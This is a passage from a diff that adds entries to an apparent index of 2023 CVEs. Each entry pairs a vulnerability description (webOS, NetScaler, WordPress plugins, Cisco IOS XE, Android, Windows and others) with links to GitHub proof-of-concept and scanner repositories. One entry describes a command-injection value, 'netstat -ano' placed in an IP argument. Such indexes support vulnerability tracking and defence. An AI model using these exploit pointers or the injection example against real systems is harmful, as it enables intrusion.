+A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\n * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n
+
+
+- [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv)
+
+### CVE-2023-6538 (2023-12-11)
+
+SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles.
+
+
+- [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538)
+
+### CVE-2023-6548 (2024-01-17)
+
+Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway allows an attacker with access to NSIP, CLIP or SNIP with management interface to perform Authenticated (low privileged) remote code execution on Management Interface.
+
+
+- [Roonye660/CVE-2023-6548-POC](https://github.com/Roonye660/CVE-2023-6548-POC)
+
+### CVE-2023-6553 (2023-12-15)
+
+The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.
+
+
+- [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553)
+- [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC)
+- [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553)
+
+### CVE-2023-6567 (2024-01-11)
+
+The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc)
+
+### CVE-2023-6595 (2023-12-14)
+
+\nIn WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold.\n\n
+
+
+- [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595)
+
+### CVE-2023-6634 (2024-01-11)
+
+The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.
+
+
+- [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634)
+
+### CVE-2023-6654 (2023-12-10)
+
+In PHPEMS 6.x/7.x/8.x/9.0 wurde eine kritische Schwachstelle entdeckt. Betroffen ist eine unbekannte Verarbeitung in der Bibliothek lib/session.cls.php der Komponente Session Data Handler. Dank der Manipulation mit unbekannten Daten kann eine deserialization-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654)
+
+### CVE-2023-6661
+- [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661)
+
+### CVE-2023-6663
+- [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663)
+
+### CVE-2023-6700 (2024-02-05)
+
+The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.
+
+
+- [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700)
+
+### CVE-2023-6702 (2023-12-14)
+
+Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
+
+
+- [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702)
+
+### CVE-2023-6710 (2023-12-12)
+
+A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.
+
+
+- [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710)
+- [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710)
+
+### CVE-2023-6875 (2024-01-11)
+
+The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.
+
+
+- [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875)
+- [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875)
+- [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875)
+
+### CVE-2023-6895 (2023-12-17)
+
+In Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /php/ping.php. Mittels Manipulieren des Arguments jsondata[ip] mit der Eingabe netstat -ano mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.1.0 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
+- [FuBoLuSec/CVE-2023-6895](https://github.com/FuBoLuSec/CVE-2023-6895)
+- [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895)
+
+### CVE-2023-6933 (2024-02-05)
+
+The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+
+
+- [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933)
+
+### CVE-2023-6985 (2024-02-05)
+
+The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.
+
+
+- [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985)
+
+### CVE-2023-7016 (2024-02-27)
+
+A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access.
+
+
+- [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC)
+
+### CVE-2023-7028 (2024-01-12)
+
+An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
+
+
+- [V1lu0/CVE-2023-7028](https://github.com/V1lu0/CVE-2023-7028)
+- [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028)
+- [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028)
+- [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028)
+- [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028)
+- [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot)
+- [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab)
+- [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028)
+- [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker)
+- [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028)
+- [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit)
+
+### CVE-2023-7172 (2023-12-30)
+
+Eine kritische Schwachstelle wurde in PHPGurukul Hospital Management System 1.0 entdeckt. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Admin Dashboard. Durch Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172)
+
+### CVE-2023-7173 (2023-12-30)
+
+Es wurde eine problematische Schwachstelle in PHPGurukul Hospital Management System 1.0 gefunden. Es geht dabei um eine nicht klar definierte Funktion der Datei registration.php. Durch das Beeinflussen des Arguments First Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173)
+
+### CVE-2023-20048 (2023-11-01)
+
+A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software.
+
+
+- [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest)
+
+### CVE-2023-20052 (2023-02-16)
+
+On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:\r\n\r \r A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.\r\n\r \r This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.
+
+
+- [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052)
+
+### CVE-2023-20073 (2023-04-05)
+
+A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
+
+
+- [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073)
+
+### CVE-2023-20110 (2023-05-18)
+
+A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database.
+
+
+- [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110)
+
+### CVE-2023-20198 (2023-10-16)
+
+Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
+
+
+- [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker)
+- [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198)
+- [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester)
+- [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198)
+- [ZephrFish/CVE-2023-20198-Checker](https://github.com/ZephrFish/CVE-2023-20198-Checker)
+- [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198)
+- [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198)
+- [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector)
+- [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198)
+- [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198)
+- [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198)
+- [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection)
+- [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198)
+- [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner)
+- [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198)
+- [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner)
+- [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198)
+- [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198)
+- [RevoltSecurities/CVE-2023-20198](https://github.com/RevoltSecurities/CVE-2023-20198)
+- [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198)
+- [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix)
+- [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198)
+- [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE)
+
+### CVE-2023-20209 (2023-08-16)
+
+A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read-write privileges on the application to perform a command injection attack that could result in remote code execution on an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to establish a remote shell with root privileges.
+
+
+- [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209)
+
+### CVE-2023-20273 (2023-10-24)
+
+A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.
+
+
+- [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273)
+
+### CVE-2023-20562 (2023-08-08)
+
+\n\n\nInsufficient validation in the IOCTL (Input Output Control) input buffer in AMD uProf may allow an authenticated user to load an unsigned driver potentially leading to arbitrary kernel execution.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+
+
+- [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562)
+- [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562)
+
+### CVE-2023-20593 (2023-07-24)
+
+\nAn issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.\n\n\n\n\n\n\n
+
+
+- [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win)
+
+### CVE-2023-20598 (2023-10-17)
+
+\n\n\nAn improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses resulting in a potential arbitrary code execution.\n\n\n\n
+
+
+- [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL)
+
+### CVE-2023-20887 (2023-06-07)
+
+Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.
+
+
+- [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887)
+
+### CVE-2023-20909 (2023-04-19)
+
+In multiple functions of RunningTasks.java, there is a possible privilege escalation due to a missing privilege check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-243130512
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909)
+- [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909)
+
+### CVE-2023-20911 (2023-03-24)
+
+In addPermission of PermissionManagerServiceImpl.java , there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-242537498
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911)
+
+### CVE-2023-20918 (2023-07-12)
+
+In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918)
+- [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918)
+
+### CVE-2023-20921 (2023-01-24)
+
+In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243378132
+
+
+- [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921)
+
+### CVE-2023-20955 (2023-03-24)
+
+In onPrepareOptionsMenu of AppInfoDashboardFragment.java, there is a possible way to bypass admin restrictions and uninstall applications for all users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-258653813
+
+
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955)
+
+### CVE-2023-20963 (2023-03-24)
+
+In WorkSource, there is a possible parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-220302519
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963)
+
+### CVE-2023-21086 (2023-04-19)
+
+In isToggleable of SecureNfcEnabler.java and SecureNfcPreferenceController.java, there is a possible way to enable NFC from a secondary account due to a permissions bypass. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-238298970
+
+
+- [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086)
+
+### CVE-2023-21094 (2023-04-19)
+
+In sanitize of LayerState.cpp, there is a possible way to take over the screen display and swap the display content due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-248031255
+
+
+- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094)
+
+### CVE-2023-21097 (2023-04-19)
+
+In toUriInner of Intent.java, there is a possible way to launch an arbitrary activity due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261858325
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097)
+- [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097)
+
+### CVE-2023-21109 (2023-05-15)
+
+In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261589597
+
+
+- [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_)
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109)
+
+### CVE-2023-21118 (2023-05-15)
+
+In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-269014004
+
+
+- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118)
+- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118)
+
+### CVE-2023-21144 (2023-06-15)
+
+In doInBackground of NotificationContentInflater.java, there is a possible temporary denial or service due to long running operations. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-252766417
+
+
+- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old)
+- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144)
+
+### CVE-2023-21238 (2023-07-12)
+
+In visitUris of RemoteViews.java, there is a possible leak of images between users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238)
+
+### CVE-2023-21246 (2023-07-12)
+
+In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246)
+
+### CVE-2023-21251 (2023-07-12)
+
+In onCreate of ConfirmDialog.java, there is a possible way to connect to VNP bypassing user's consent due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.\n\n
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251)
+
+### CVE-2023-21272 (2023-08-14)
+
+In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272)
+- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272)
+
+### CVE-2023-21275 (2023-08-14)
+
+In decideCancelProvisioningDialog of AdminIntegratedFlowPrepareActivity.java, there is a possible way to bypass factory reset protections due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275)
+
+### CVE-2023-21281 (2023-08-14)
+
+In multiple functions of KeyguardViewMediator.java, there is a possible failure to lock after screen timeout due to a logic error in the code. This could lead to local escalation of privilege across users with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281)
+
+### CVE-2023-21282 (2023-08-14)
+
+In TRANSPOSER_SETTINGS of lpp_tran.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.\n\n
+
+
+- [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282)
+- [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282)
+
+### CVE-2023-21284 (2023-08-14)
+
+In multiple functions of DevicePolicyManager.java, there is a possible way to prevent enabling the Find my Device feature due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284)
+
+### CVE-2023-21285 (2023-08-14)
+
+In setMetadata of MediaSessionRecord.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch)
+- [krnidhi/frameworks_base_AOSP10_r33_CVE-2023-21285](https://github.com/krnidhi/frameworks_base_AOSP10_r33_CVE-2023-21285)
+
+### CVE-2023-21286 (2023-08-14)
+
+In visitUris of RemoteViews.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286)
+
+### CVE-2023-21288 (2023-08-14)
+
+In visitUris of Notification.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.\n\n
+
+
+- [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288)
+
+### CVE-2023-21554 (2023-04-11)
+
+Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
+
+
+- [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554)
+
+### CVE-2023-21560 (2023-01-10)
+
+Windows Boot Manager Security Feature Bypass Vulnerability
+
+
+- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk)
+
+### CVE-2023-21674 (2023-01-10)
+
+Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
+
+
+- [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674)
+
+### CVE-2023-21716 (2023-02-14)
+
+Microsoft Word Remote Code Execution Vulnerability
+
+
+- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)
+
+### CVE-2023-21746 (2023-01-10)
+
+Windows NTLM Elevation of Privilege Vulnerability
+
+
+- [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746)
+
+### CVE-2023-21752 (2023-01-10)
+
+Windows Backup Service Elevation of Privilege Vulnerability
+
+
+- [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752)
+
